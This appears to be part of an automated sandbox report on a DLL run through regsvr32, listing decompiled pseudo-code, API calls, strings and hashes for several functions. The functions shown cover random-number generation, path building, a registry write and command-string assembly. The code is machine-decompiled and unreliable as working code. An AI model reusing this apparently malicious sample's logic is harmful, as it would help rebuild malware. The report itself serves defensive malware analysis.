Opcode Fuzzy Hash: f25d4951e7758c3f69da3f6c48813e30d85f150e9e2f1a2842195e031f7cba4e
Instruction Fuzzy Hash: 0EB15071E00258AFDB14CFA4C889EDEBBB8EF49315F10416AF505EB690DB749E44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CB116F0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E6CB116F0(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x6cb116f9
0x6cb11700
0x6cb11709
0x6cb1170d
0x6cb11788
0x00000000
0x6cb1178a
0x6cb1171b
0x6cb1171d
0x6cb11722
0x00000000
0x00000000
0x6cb1172a
0x6cb1172c
0x6cb11731
0x00000000
0x00000000
0x6cb1173b
0x6cb1173f
0x00000000
0x00000000
0x6cb11741
0x6cb11746
0x6cb11748
0x6cb11749
0x6cb1174d
0x6cb11753
0x00000000
0x00000000
0x6cb1175e
0x6cb11767
0x6cb1176b
0x00000000
0x00000000
0x6cb1176d
0x6cb1176f
0x6cb11777
0x6cb11779
0x6cb1177a
0x6cb11782
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,6CB0763B,?,?,00000000,?), ref: 6CB11703
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 6CB1171B
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 6CB1172A
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 6CB11739

Strings

advapi32.dll, xrefs: 6CB116FB
CryptGenRandom, xrefs: 6CB11724
CryptReleaseContext, xrefs: 6CB11733
CryptAcquireContextA, xrefs: 6CB11715

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 38ed19e342162019aa6ec42bef5563f9ace9381d9ac1bcb8bacc42621e11e9dc
Instruction ID: 58d97b8b584b55ce5fd833fb085ce2372226d13c94b6e8b96bb64369ec71dab8
Opcode Fuzzy Hash: 38ed19e342162019aa6ec42bef5563f9ace9381d9ac1bcb8bacc42621e11e9dc
Instruction Fuzzy Hash: F3115C75E05699BBEB025BB98C84EAF7BFCEF65244F240464F910F3E00D630CA0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 6CB1215A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6CB1215A(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L6CB122BD();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L6CB12305();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E6CB086E7(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x6cb109ea
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x6cb1215d
0x6cb12162
0x6cb12166
0x6cb12166
0x6cb1216b
0x6cb12170
0x6cb12171
0x6cb12174
0x6cb12175
0x6cb1217a
0x6cb1217d
0x6cb1217e
0x6cb12183
0x6cb1218a
0x6cb12230
0x6cb12230
0x00000000
0x6cb12199
0x6cb12199
0x6cb121a0
0x6cb121a4
0x6cb121ab
0x6cb121b4
0x6cb121b6
0x6cb121b6
0x6cb121b4
0x6cb121c5
0x6cb121eb
0x6cb121f4
0x6cb121f6
0x6cb121fc
0x6cb1222b
0x6cb1222b
0x6cb12233
0x6cb12236
0x6cb12236
0x6cb121fe
0x6cb121ff
0x6cb12205
0x6cb12207
0x6cb12207
0x6cb1220c
0x6cb1220b
0x6cb1220b
0x6cb12213
0x6cb1221f
0x6cb12229
0x6cb12229
0x00000000
0x6cb121d5
0x6cb121d5
0x6cb121d5
0x6cb121db
0x00000000
0x00000000
0x6cb121dd
0x6cb121e3
0x6cb121e8
0x00000000
0x6cb121e8
0x6cb121c5

APIs

_snprintf.MSVCRT ref: 6CB1217E
localeconv.MSVCRT ref: 6CB12199
strchr.MSVCRT ref: 6CB121AB
strchr.MSVCRT ref: 6CB121BC
strchr.MSVCRT ref: 6CB121CA
strchr.MSVCRT ref: 6CB121EF

Strings

%.*g, xrefs: 6CB12175

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: 763034b3cfb6760484d7446000b9549508b4abd7b380acb6e18be2813937225a
Instruction ID: 7b8c35226f3ebc2cc4f7e93fbe905a12e9376336582f7d9b60d0be98c1cedea8
Opcode Fuzzy Hash: 763034b3cfb6760484d7446000b9549508b4abd7b380acb6e18be2813937225a
Instruction Fuzzy Hash: C521366628C6C12AD3158A69EC88B9F37ACEB0B338F150115F9508AF81EB65D94483E3

Uniqueness

Uniqueness Score: -1.00%

Function 6CB102EA, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 6CB1036A
qsort.MSVCRT ref: 6CB105E8

Strings

true, xrefs: 6CB10341
%I64d, xrefs: 6CB1035C
null, xrefs: 6CB1032F
false, xrefs: 6CB1034D

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 5cf194c16ce753c8b7fd1b623fa6ccb54fa0f7d9ff184fc906b30430554b7989
Instruction ID: 158612aa3e22af9197ed30dc7e982242e310e6b1d26c4cb888dd831e46480eab
Opcode Fuzzy Hash: 5cf194c16ce753c8b7fd1b623fa6ccb54fa0f7d9ff184fc906b30430554b7989
Instruction Fuzzy Hash: E4E16A715082CAABDB019F65EC81EEF3B79EF49358F048429FD1496E40E731DA709BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CB049FE, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6CB049FE(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x6cb1e688; // 0xd40590
					_t3 = _t123 + 0x110; // 0xdbfd98
					_t125 =  *0x6cb1e68c; // 0xdbfc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *_t3)));
				}
				if(E6CB0BBCF(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E6CB0B7EA(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E6CB0B6BF(_t66,  &_v1076, _t206, _t208);
					_t129 = E6CB049BA( &_v1076,  &_v1076, _t206);
					_t141 = E6CB0D442( &_v1076, E6CB0C3BB( &_v1076), 0);
					E6CB0B8CC(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E6CB02C82(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E6CB092C6(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x6cb1e688; // 0xd40590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E6CB091C4(_v1112);
								_t145 = _t130;
								 *0x6cb1e740 = _t76;
								 *0x6cb1e738 = E6CB091C4(_t145);
								L17:
								_push(_t145);
								_t188 = E6CB09B24( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x6cb1b9c6);
								E6CB09F13(0xe);
								E6CB09F37(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E6CB0A076(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E6CB0A3D8(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E6CB0A3D8(_t188, _t180, _t208);
								}
								_t87 = E6CB097ED(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E6CB0A076(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x6cb1e688; // 0xd40590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E6CB0FC57(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x6cb1e688; // 0xd40590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E6CB0E280(_t183);
										}
										E6CB052B3( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x6cb1e688; // 0xd40590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E6CB0109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E6CB085B6( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xd407b8
									_t153 = _t51;
									L25:
									_t90 = E6CB05532(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x6cb1e688; // 0xd40590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E6CB0C2D4(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x6cb1e684; // 0xdbfaa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x6cb1e684; // 0xdbfaa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E6CB085FB( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E6CB085FB( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t17 = _t75 + 0x1898; // 0x0
						_t116 =  *_t17;
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E6CB0E2C8(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E6CB095C2(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E6CB0C02E(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E6CB085B6( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E6CB02B97( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x6cb049fe
0x6cb04a0b
0x6cb04a16
0x6cb04a1b
0x6cb04a1d
0x6cb04a20
0x6cb04a25
0x6cb04a28
0x6cb04a32
0x6cb04a34
0x6cb04a39
0x6cb04a41
0x6cb04a4a
0x6cb04a4a
0x6cb04a57
0x6cb04a72
0x6cb04a79
0x6cb04a7b
0x6cb04a80
0x6cb04a85
0x6cb04a8b
0x6cb04a9a
0x6cb04ab9
0x6cb04abb
0x6cb04ac1
0x6cb04ac7
0x6cb04acc
0x6cb04ad0
0x6cb04ad3
0x6cb04add
0x6cb04adf
0x6cb04ae0
0x6cb04aeb
0x6cb04aed
0x6cb04af0
0x6cb04af5
0x6cb04afc
0x6cb04b51
0x6cb04b51
0x6cb04b56
0x6cb04bbd
0x6cb04bc2
0x6cb04bc4
0x6cb04bce
0x6cb04bd3
0x6cb04bd3
0x6cb04bed
0x6cb04bef
0x6cb04bf2
0x6cb04bf4
0x00000000
0x00000000
0x6cb04bfa
0x6cb04c04
0x6cb04c0d
0x6cb04c12
0x6cb04c15
0x6cb04c1b
0x6cb04c21
0x6cb04c29
0x6cb04c2b
0x6cb04c2e
0x6cb04c2f
0x6cb04c34
0x6cb04c37
0x6cb04c3a
0x6cb04c3c
0x6cb04c40
0x6cb04c40
0x6cb04c45
0x6cb04c48
0x6cb04c4a
0x6cb04c4e
0x6cb04c4e
0x6cb04c55
0x6cb04c5a
0x6cb04c5c
0x6cb04c60
0x6cb04c62
0x6cb04c68
0x6cb04c6c
0x6cb04c6f
0x6cb04c70
0x6cb04c75
0x6cb04c78
0x6cb04c7d
0x6cb04ca5
0x6cb04cab
0x6cb04cb2
0x6cb04cc1
0x6cb04cc6
0x00000000
0x6cb04cc6
0x6cb04cb4
0x00000000
0x6cb04c7f
0x6cb04c7f
0x6cb04c84
0x6cb04c8b
0x6cb04cd0
0x6cb04cd0
0x6cb04cd7
0x6cb04cdb
0x6cb04cdc
0x6cb04cdc
0x6cb04ce6
0x6cb04ceb
0x6cb04cee
0x6cb04cef
0x6cb04cf1
0x6cb04cf3
0x6cb04cf8
0x6cb04cff
0x6cb04d42
0x6cb04d01
0x6cb04d06
0x6cb04d0e
0x6cb04d12
0x6cb04d1d
0x6cb04d28
0x6cb04d30
0x6cb04d34
0x6cb04d3c
0x6cb04d3c
0x6cb04cff
0x6cb04d48
0x6cb04d4b
0x6cb04d4d
0x6cb04d53
0x6cb04d53
0x6cb04d55
0x6cb04d55
0x00000000
0x6cb04d55
0x6cb04c8d
0x6cb04c8d
0x6cb04c93
0x6cb04c95
0x6cb04c9a
0x6cb04c9a
0x6cb04c9c
0x6cb04ccb
0x00000000
0x6cb04ccb
0x6cb04c9e
0x6cb04ad7
0x6cb04ad7
0x00000000
0x6cb04ad7
0x6cb04c7d
0x6cb04b5c
0x6cb04b6a
0x6cb04b7d
0x6cb04b82
0x6cb04b88
0x6cb04b8a
0x6cb04ba2
0x6cb04ba7
0x6cb04bb0
0x6cb04bb6
0x00000000
0x6cb04bb6
0x6cb04b92
0x6cb04b9b
0x00000000
0x6cb04b9b
0x6cb04afe
0x6cb04afe
0x6cb04b04
0x6cb04b06
0x6cb04b44
0x6cb04b46
0x00000000
0x00000000
0x6cb04b48
0x6cb04b4c
0x00000000
0x6cb04b4c
0x6cb04b08
0x6cb04b12
0x6cb04b1e
0x6cb04b29
0x6cb04b30
0x6cb04b3a
0x6cb04b3f
0x00000000
0x6cb04b3f
0x6cb04ad5
0x00000000
0x6cb04a59
0x6cb04a64
0x6cb04a6a
0x6cb04a6c
0x6cb04d57
0x6cb04d57
0x6cb04d59
0x6cb04d5f
0x6cb04d5f
0x00000000
0x6cb04a6c

APIs

memset.MSVCRT ref: 6CB04A20
lstrcpyW.KERNEL32(00000000,00000000), ref: 6CB04D12
lstrcatW.KERNEL32 ref: 6CB04D30
lstrcatW.KERNEL32 ref: 6CB04D34
lstrcatW.KERNEL32 ref: 6CB04D3C
lstrcpyW.KERNEL32(00000000,00000000), ref: 6CB04D42

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: c84e882f850397b9bc6f8ab00c68ad21ed1775e71cba7f0ecbd4980ef508b60f
Instruction ID: 90972d339e8d798d0aa0c2f7701542fd28fb4c5790cafcc6e03938d581fc664a
Opcode Fuzzy Hash: c84e882f850397b9bc6f8ab00c68ad21ed1775e71cba7f0ecbd4980ef508b60f
Instruction Fuzzy Hash: 2891BF71704380AFE704DB24C849FAE7BE9EB95318F144A2DF5559BB90EB70D908CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0D78A, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 6CB0D79E
SysAllocString.OLEAUT32(?), ref: 6CB0D7A6
SysAllocString.OLEAUT32(00000000), ref: 6CB0D7BA
SysFreeString.OLEAUT32(?), ref: 6CB0D835
SysFreeString.OLEAUT32(?), ref: 6CB0D838
SysFreeString.OLEAUT32(?), ref: 6CB0D83D

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: a1f5d2d961abef3694bebdb2b482af2d09f2b5e83c332f1183da023e84ff5dc8
Instruction ID: 7620ce02d2796502f62cd5660dd9be9fd7c33fbed668adedd915b536649229c6
Opcode Fuzzy Hash: a1f5d2d961abef3694bebdb2b482af2d09f2b5e83c332f1183da023e84ff5dc8
Instruction Fuzzy Hash: 1F21C975E00218AFDB00DFA5CC88DAFBBBDFF49658B14449AE505E7250DB71AE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CB1082F, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 6CB1089D
\u%04X\u%04X, xrefs: 6CB10988
\u%04X, xrefs: 6CB10949

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: ace4fdb672fd312948c4b7397c22314569319fe03ba1c5a148b1b7cc43e57ad2
Instruction ID: e7909e651e983d06a28d834bf41ceb7fdc666719f4b3236ac5b5e8b406c8736b
Opcode Fuzzy Hash: ace4fdb672fd312948c4b7397c22314569319fe03ba1c5a148b1b7cc43e57ad2
Instruction Fuzzy Hash: A6413C3264C2C59BFB108E5CADA6BBE3A74EF05368F200166FD51D6F45D621C9B082D3

Uniqueness

Uniqueness Score: -1.00%

Function 6CB12237, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6CB12237(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L6CB12305();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L6CB122C9();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x6cb18250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L6CB122C9();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x6cb18258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x6cb12237
0x6cb1223f
0x6cb12244
0x6cb12247
0x6cb1224c
0x6cb12252
0x6cb1225b
0x6cb1225f
0x6cb1225f
0x6cb1225b
0x6cb12261
0x6cb12266
0x6cb1226f
0x6cb12274
0x6cb12277
0x6cb12280
0x6cb12282
0x6cb12289
0x6cb1229a
0x6cb1229a
0x6cb1229c
0x6cb122a4
0x6cb122ab
0x00000000
0x6cb122a6
0x6cb122aa
0x6cb122aa
0x6cb1228b
0x6cb1228b
0x6cb12291
0x6cb12293
0x6cb12298
0x6cb122ae
0x6cb122b1
0x6cb122b6
0x00000000
0x00000000
0x00000000
0x6cb12298

APIs

localeconv.MSVCRT ref: 6CB1223F
strchr.MSVCRT ref: 6CB12252
_errno.MSVCRT ref: 6CB12261
strtod.MSVCRT ref: 6CB1226F
_errno.MSVCRT ref: 6CB1229C

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: 8e6ef167d870fddf9b07e249a5ed627fd71c43ea8176b8b9f7d7f5454038d115
Instruction ID: 2929790dd801e8450098f72438d94a1df9a736cd16f4b0a9ec36180974c3f896
Opcode Fuzzy Hash: 8e6ef167d870fddf9b07e249a5ed627fd71c43ea8176b8b9f7d7f5454038d115
Instruction Fuzzy Hash: 9E012F35A08285ABDB022F24E9087DD7BB4AF4B364F2102D0D98067ED1DB759428C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0CFC6, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6CB0CFC6(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x6cb1e688; // 0xd40590
				GetCurrentProcess();
				_t11 = E6CB0BA47();
				_t1 = _t29 + 0x1644; // 0xd41bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E6CB08F9F(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xd407b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E6CB08F9F(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
